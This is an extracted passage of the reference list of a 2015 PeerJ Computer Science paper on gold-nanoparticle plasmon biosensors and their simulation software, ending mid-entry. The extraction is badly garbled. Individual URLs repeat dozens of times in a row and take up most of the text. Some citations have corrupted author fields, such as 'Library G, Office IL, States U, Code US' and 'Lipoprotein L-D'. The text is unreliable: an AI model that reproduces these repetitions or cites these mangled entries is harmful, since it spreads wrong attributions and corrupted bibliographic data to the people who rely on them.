http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://dx.doi.org/10.1038/ncomms2289 http://dx.doi.org/10.1002/pssc.201400190 http://cython.org http://cython.org http://cython.org http://cython.org http://cython.org http://cython.org http://cython.org http://cython.org http://cython.org http://cython.org http://cython.org http://cython.org http://cython.org http://cython.org http://cython.org http://cython.org http://cython.org http://dx.doi.org/10.1016/0370-1573(78)90009-1 http://dx.doi.org/10.1051/0004-6361/201322549 http://dx.doi.org/10.7717/peerj-cs.17 Brown LO, Doorn SK. 2008. Optimization of the preparation of glass-coated, dye-tagged metal nanoparticles as SERS substrates. Langmuir: the ACS Journal of Surfaces and Colloids 24(5):2178–2185 DOI 10.1021/la703218f. Bruggeman D. 1935. Calculation of different physical constants of heterogeneous substances I: dielectric constant and conductivity of media of isotropic substances. Annales de Physique 24:636–664 DOI 10.1002/andp.19354160705. Byrnes S. 2012. tmm. Available at https://pypi.python.org/pypi/tmm. Chang T-C, Wu C-C, Wang S-C, Chau L-K, Hsieh W-H. 2013. Using a fiber optic particle plasmon resonance biosensor to determine kinetic constants of antigen-antibody binding reaction. Analytical chemistry 85(1):245–250 DOI 10.1021/ac302590n. Chen K, Obinata H, Izumi T. 2010. Detection of G protein-coupled receptor-mediated cellular response involved in cytoskeletal rearrangement using surface plasmon resonance. Biosensors & Bioelectronics 25(7):1675–1680 DOI 10.1016/j.bios.2009.12.006. Cheng Y, Wang M, Borghs G, Chen H. 2011. Gold nanoparticle dimers for plasmon sensing. Langmuir 27:7884–7891 DOI 10.1021/la200840m. Cooper CD, Bardhan JP, Barba LA. 2014. A biomolecular electrostatics solver using Python, GPUs and boundary elements that can handle solvent-filled cavities and Stern layers. Computer Physics Communications 3(185):720–729 DOI 10.1016/j.cpc.2013.10.028. Elias M, Elias G. 2002. New and fast calculation for incoherent multiple scattering. Journal of the Optical Society of America A 19(5):894–901 DOI 10.1364/JOSAA.19.000894. Enthought. 2013. Enthought tool suite. Version 4.3.0. Available at http://code.enthought.com/ projects/. ForteBio. 2013. Octet platform. Technical Report. Available at http://www.mscience.com.au/upload/ pages/fortebio/octet platform brochure low-rez.pdf?1439858924. Francis EM. 2014. EMpy: electromagnetic python. Available at http://lbolla.github.io/EMpy/. Freeman RG, Grabar KC, Allison KJ, Bright RM, Davis JA, Guthrie AP, Hommer MB, Jackson MA, Smith PC, Walter DG, Natan MJ. 1995. Self-assembled metal colloid monolayers: an approach to SERS substrates. Science 267(5204):1629–1632 DOI 10.1126/science.267.5204.1629. Fujiwara K, Kasaya H, Ogawa N. 2009. Gold nanoparticle monolayer formation on a chemically modified glass surface. Analytical Sciences : the International Journal of the Japan Society for Analytical Chemistry 25(2):241–248 DOI 10.2116/analsci.25.241. Gao L, Lemarchand F, Lequime M. 2011. Comparison of different dispersion models for single layer optical thin film index determination. Thin Solid Films 520(1):501–509 DOI 10.1016/j.tsf.2011.07.028. Garcıa MA, Llopis J, Paje SE. 1999. A simple model for evaluating the optical absorption spectrum from small Au-colloids in sol—gel films. Chemical Physics Letters 314:313–320 DOI 10.1016/S0009-2614(99)01206-3. Garnett J. 1904. Colours in metal glasses and in metallic films. Philosophical Transactions of the Royal Society 208:385–420 DOI 10.1098/rsta.1904.0024. Glycerine Producers’ Association. 1963. Physical properties of glycerine and its solutions. New York: Glycerine Producers’ Association. Gupta BD, Verma RK. 2009. Surface plasmon resonance-based fiber optic sensors: principle, probe designs, and some applications. Journal of Sensors 2009:979761 DOI 10.1155/2009/979761. Hughes et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.17 18/23 https://peerj.com/computer-science/ http://dx.doi.org/10.1021/la703218f http://dx.doi.org/10.1002/andp.19354160705 https://pypi.python.org/pypi/tmm https://pypi.python.org/pypi/tmm https://pypi.python.org/pypi/tmm https://pypi.python.org/pypi/tmm https://pypi.python.org/pypi/tmm https://pypi.python.org/pypi/tmm https://pypi.python.org/pypi/tmm https://pypi.python.org/pypi/tmm https://pypi.python.org/pypi/tmm https://pypi.python.org/pypi/tmm https://pypi.python.org/pypi/tmm https://pypi.python.org/pypi/tmm https://pypi.python.org/pypi/tmm https://pypi.python.org/pypi/tmm https://pypi.python.org/pypi/tmm https://pypi.python.org/pypi/tmm https://pypi.python.org/pypi/tmm https://pypi.python.org/pypi/tmm https://pypi.python.org/pypi/tmm https://pypi.python.org/pypi/tmm https://pypi.python.org/pypi/tmm https://pypi.python.org/pypi/tmm https://pypi.python.org/pypi/tmm https://pypi.python.org/pypi/tmm https://pypi.python.org/pypi/tmm https://pypi.python.org/pypi/tmm https://pypi.python.org/pypi/tmm https://pypi.python.org/pypi/tmm https://pypi.python.org/pypi/tmm https://pypi.python.org/pypi/tmm https://pypi.python.org/pypi/tmm https://pypi.python.org/pypi/tmm http://dx.doi.org/10.1021/ac302590n http://dx.doi.org/10.1016/j.bios.2009.12.006 http://dx.doi.org/10.1021/la200840m http://dx.doi.org/10.1016/j.cpc.2013.10.028 http://dx.doi.org/10.1364/JOSAA.19.000894 http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf?1439858924 http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf?1439858924 http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf?1439858924 http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf?1439858924 http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf?1439858924 http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf?1439858924 http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf?1439858924 http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf?1439858924 http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf?1439858924 http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf?1439858924 http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf?1439858924 http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf?1439858924 http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf?1439858924 http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf?1439858924 http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf?1439858924 http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf?1439858924 http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf?1439858924 http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf?1439858924 http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf?1439858924 http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf?1439858924 http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf?1439858924 http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf?1439858924 http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf?1439858924 http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf?1439858924 http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf?1439858924 http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf?1439858924 http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf?1439858924 http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf?1439858924 http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf?1439858924 http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf?1439858924 http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf?1439858924 http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf?1439858924 http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf?1439858924 http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf?1439858924 http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf?1439858924 http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf?1439858924 http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf?1439858924 http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf?1439858924 http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf?1439858924 http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf?1439858924 http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf?1439858924 http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf?1439858924 http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf?1439858924 http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf?1439858924 http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf?1439858924 http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf?1439858924 http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf?1439858924 http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf?1439858924 http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf?1439858924 http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf?1439858924 http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf?1439858924 http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf?1439858924 http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf?1439858924 http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf?1439858924 http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf?1439858924 http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf?1439858924 http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf?1439858924 http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf?1439858924 http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf?1439858924 http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf?1439858924 http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf?1439858924 http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf?1439858924 http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf?1439858924 http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf?1439858924 http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf?1439858924 http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf?1439858924 http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf?1439858924 http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf?1439858924 http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf?1439858924 http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf?1439858924 http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf?1439858924 http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf?1439858924 http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf?1439858924 http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf?1439858924 http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf?1439858924 http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf?1439858924 http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf?1439858924 http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf?1439858924 http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf?1439858924 http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf?1439858924 http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf?1439858924 http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf?1439858924 http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf?1439858924 http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf?1439858924 http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf?1439858924 http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf?1439858924 http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf?1439858924 http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf?1439858924 http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf?1439858924 http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf?1439858924 http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf?1439858924 http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf?1439858924 http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf?1439858924 http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf?1439858924 http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf?1439858924 http://lbolla.github.io/EMpy/ http://lbolla.github.io/EMpy/ http://lbolla.github.io/EMpy/ http://lbolla.github.io/EMpy/ http://lbolla.github.io/EMpy/ http://lbolla.github.io/EMpy/ http://lbolla.github.io/EMpy/ http://lbolla.github.io/EMpy/ http://lbolla.github.io/EMpy/ http://lbolla.github.io/EMpy/ http://lbolla.github.io/EMpy/ http://lbolla.github.io/EMpy/ http://lbolla.github.io/EMpy/ http://lbolla.github.io/EMpy/ http://lbolla.github.io/EMpy/ http://lbolla.github.io/EMpy/ http://lbolla.github.io/EMpy/ http://lbolla.github.io/EMpy/ http://lbolla.github.io/EMpy/ http://lbolla.github.io/EMpy/ http://lbolla.github.io/EMpy/ http://lbolla.github.io/EMpy/ http://lbolla.github.io/EMpy/ http://lbolla.github.io/EMpy/ http://lbolla.github.io/EMpy/ http://lbolla.github.io/EMpy/ http://lbolla.github.io/EMpy/ http://lbolla.github.io/EMpy/ http://lbolla.github.io/EMpy/ http://dx.doi.org/10.1126/science.267.5204.1629 http://dx.doi.org/10.2116/analsci.25.241 http://dx.doi.org/10.1016/j.tsf.2011.07.028 http://dx.doi.org/10.1016/S0009-2614(99)01206-3 http://dx.doi.org/10.1098/rsta.1904.0024 http://dx.doi.org/10.1155/2009/979761 http://dx.doi.org/10.7717/peerj-cs.17 Habashy TM, Abubakar A. 2007. Formulation for modeling of the electromagnetic fields. Journal of Electromagnetic Waves and Applications 21(9):1145–1159. Haes A, Change L, Klein W, Van Duyne R. 2005. Detection of a biomarker for Alzheimer’s disease from synthetic and clinical samples using a nanoscale optical biosensor. JACS 127:2264–2271 DOI 10.1021/ja044087q. Hagemann H-J, Gudat W, Kunz C. 1975. Optical constants from the far infrared to the X-ray region: Mg, Al, Cu, Ag, Au, Bi, C, and Al2O3. Journal of the Optical Society of America 65(6):742–744 DOI 10.1364/JOSA.65.000742. Hohenester U, Trugler A. 2012. MNPBEM: a MATLAB toolbox. Computer Physics Communications 183:370–381 DOI 10.1016/j.cpc.2011.09.009. Hughes A, Liu Z. 2014. scikit-spectra: tools for explorative spectroscopy. Available at http:// hugadams.github.io/scikit-spectra/. Hughes A, Liu Z, Raftari M, Reeves ME. 2015. A workflow for characterizing nanoparticle monolayers for biosensors: machine learning on real and artificial SEM images. PeerJ Preprints 2:e671v2 DOI 10.7287/peerj.preprints.671v2. Hutter E, Fendler JH. 2002. Size quantized formation and self-assembly of gold encased silver nanoparticles. Chem Communication 5:378–379 DOI 10.1039/b108163b. Issa NA, Guckenberger R. 2006. Optical nanofocusing on tapered metallic waveguides. Plasmonics 2(1):31–37 DOI 10.1007/s11468-006-9022-7. Jain PK, Lee KS, El-Sayed IH, El-Sayed MA. 2006. Calculated absorption and scattering properties of gold nanoparticles of different size, shape, and composition: applications in biological imaging and biomedicine. The Journal of Physical Chemistry B 110(14):7238–7248 DOI 10.1021/jp057170o. Jans H, Liu X, Austin L, Maes G, Huo Q. 2009. Dynamic light scattering as a powerful tool for gold nanoparticle bioconjugation and biomolecular binding studies. Analytical Chemistry 81(22):9425–9432 DOI 10.1021/ac901822w. Jeong H-H, Erdene N, Park J-H, Jeong D-H, Lee S-K. 2012. Analysis of fiber-optic localized surface plasmon resonance sensor by controlling formation of gold nanoparticles and its bio-application. Journal of Nanoscience and Nanotechnology 12:7815–7821 DOI 10.1166/jnn.2012.6218. Jeong Hyeon-Ho, Lee S-K. 2011. The method of measurement signal processing of biosensor based on optical fiber using reflected localized surface plasmon resonance. Journal of Sensor Science and Technology 20(2):107–113 DOI 10.5369/JSST.2011.20.2.107. Johnson P, Christy R. 1972. Optical constants of noble metals. Physical Review B 6(12):4370–4379 DOI 10.1103/PhysRevB.6.4370. Jong WHD. 2008. Drug delivery and nanoparticles: applications and hazards. International Journal of Nanomedicine 3(2):133–149 DOI 10.2147/IJN.S596. Kessentini S, Barchiesi D. 2012. Quantitative comparison of optimized nanorods, nanoshells and hollow nanospheres for photothermal therapy. Biomedical Optics Express 3(3):590–604 DOI 10.1364/BOE.3.000590. Klebstov NG. 2004. Optical models for conjugates of gold and silver nanoparticles with biomacromolecules. Journal of Quantitative Spectroscopy & Radiative Transfer 89:143–153 DOI 10.1016/j.jqsrt.2004.05.018. Kraziński BE, Radecki J, Radecka H. 2011. Surface plasmon resonance based biosensors for exploring the influence of alkaloids on aggregation of amyloid-β peptide. Sensors 11(4):4030–4042 DOI 10.3390/s110404030. Hughes et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.17 19/23 https://peerj.com/computer-science/ http://dx.doi.org/10.1021/ja044087q http://dx.doi.org/10.1364/JOSA.65.000742 http://dx.doi.org/10.1016/j.cpc.2011.09.009 http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://dx.doi.org/10.7287/peerj.preprints.671v2 http://dx.doi.org/10.1039/b108163b http://dx.doi.org/10.1007/s11468-006-9022-7 http://dx.doi.org/10.1021/jp057170o http://dx.doi.org/10.1021/ac901822w http://dx.doi.org/10.1166/jnn.2012.6218 http://dx.doi.org/10.5369/JSST.2011.20.2.107 http://dx.doi.org/10.1103/PhysRevB.6.4370 http://dx.doi.org/10.2147/IJN.S596 http://dx.doi.org/10.1364/BOE.3.000590 http://dx.doi.org/10.1016/j.jqsrt.2004.05.018 http://dx.doi.org/10.3390/s110404030 http://dx.doi.org/10.7717/peerj-cs.17 Lans PC. 2013. Spectral density analysis of thin gold films: thickness and structure dependence of the optical properties. In: Progress in electromagnetics research symposium proceedings, vol. 1, Stockholm, 443–447. Lecaruyer P, Maillart E, Canva M, Rolland J. 2006. Generalization of the Rouard method to an absorbing thin-film stack and application to surface plasmon resonance. Applied Optics 45(33):8419–8423 DOI 10.1364/AO.45.008419. Lee K-S, El-Sayed MA. 2006. Gold and silver nanoparticles in sensing and imaging: sensitivity of plasmon response to size, shape, and metal composition. The Journal of Physical Chemistry B 110(39):19220–19225 DOI 10.1021/jp062536y. Lee J-Y, Lee C-W, Lin E-H, Wei P-K. 2008. Single live cell refractometer using nanoparticle coated fiber tip. Applied Physics Letters 93(17):173110 DOI 10.1063/1.3009205. Li X, Tamada K, Baba A, Knoll W, Hara M. 2006. Estimation of dielectric function of biotin-capped gold nanoparticles via signal enhancement on surface plasmon resonance. The Journal of Physical Chemistry. B 110(32):15755–15762 DOI 10.1021/jp062004h. Library G, Office IL, States U, Code US. 2013. Theoretical investigations for surface plasmon resonance based optical fiber tip sensor. Sensors and Actuators B: Chemical (188):757–760. Lin H-Y, Huang C-H, Liu Y-C, Huang K-W, Chau L-K. 2012. Multiplex fiber-optic biosensor using multiple particle plasmon resonances. In: Canning J, Peng G, eds. Third Asia Pacific optical sensors conference. 83512S–83512S–7. Lin H, Liu CP, Wang C. 2015. A simple and universal setup of quasi-monocolor gamma-ray source. 1–18 ArXiv preprint. arXiv:1503.00815. Lipoprotein L-D, Verma R, Srivastava SK, Gupta BD. 2012. Surface-plasmon-resonance-based fiber-optic sensor for the detection. IEEE Sensors Journal 12(12):3460–3466 DOI 10.1109/JSEN.2012.2210402. Litos IK, Ioannou PC, Christopoulos TK, Traeger-Synodinos J, Kanavakis E. 2009. Multianalyte, dipstick-type, nanoparticle-based DNA biosensor for visual genotyping of single-nucleotide polymorphisms. Biosensors & Bioelectronics 24(10):3135–3139 DOI 10.1016/j.bios.2009.03.010. Liu X, Wu Y, Wang X, Li R, Zhang Z. 2011. Effect of interphase on effective permittivity of composites. Journal of Physics D: Applied Physics 44(11):115402 DOI 10.1088/0022-3727/44/11/115402. Lopatynskyi AM, Lopatynska OG, Guo LJ, Chegel VI. 2011. Localized surface plasmon resonance biosensor—Part I: theoretical study of sensitivity—extended mie approach. IEEE Sensors Journal 11(2):361–369 DOI 10.1109/JSEN.2010.2057418. Luo R. 1997. Effective medium theories for the optical properties of three-component composite materials. Applied Optics 